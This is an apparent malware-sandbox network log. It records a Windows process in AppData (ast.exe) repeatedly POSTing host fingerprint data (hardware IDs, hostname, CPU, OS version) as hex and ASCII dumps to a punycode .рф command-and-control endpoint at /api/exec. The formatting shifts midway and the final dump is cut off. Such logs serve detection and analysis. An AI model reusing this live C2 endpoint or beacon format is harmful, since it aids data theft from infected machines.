23          192.168.2.5  50057        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:36 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:36 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
24          192.168.2.5  50060        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:38 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:38 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.
2024-11-19 18:15:38 UTC  403                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
                                                       1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.19045) x64


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
25          192.168.2.5  50063        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:38 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:38 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
26         | 192.168.2.5 | 50066       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:39 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:39 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
27         | 192.168.2.5 | 50069       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:40 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:40 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
28         | 192.168.2.5 | 50078       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:43 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:43 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
29         | 192.168.2.5 | 50081       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:44 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:44 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
30         | 192.168.2.5 | 50084       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:45 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:45 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
31         | 192.168.2.5 | 50087       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:46 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:46 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
32         | 192.168.2.5 | 50090       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:47 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:47 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
33         | 192.168.2.5 | 50093       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:48 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:48 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
34         | 192.168.2.5 | 50096       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:48 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:48 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
35         | 192.168.2.5 | 50099       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:49 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:49 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
36         | 192.168.2.5 | 50102       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:50 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:50 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
37         | 192.168.2.5 | 50105       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:51 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:51 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
38         | 192.168.2.5 | 50108       | 212.193.169.65 | 443              | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp               | Bytes transferred | Direction | Data
2024-11-19 18:15:52 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                        |     |     | Host: id.xn--80akicokc0aablc.xn--p1ai:443
                        |     |     | Content-Length: 269
2024-11-19 18:15:52 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                        |     |     | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 39
Source IP: 192.168.2.5
Source Port: 50111
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:15:53 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:15:53 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 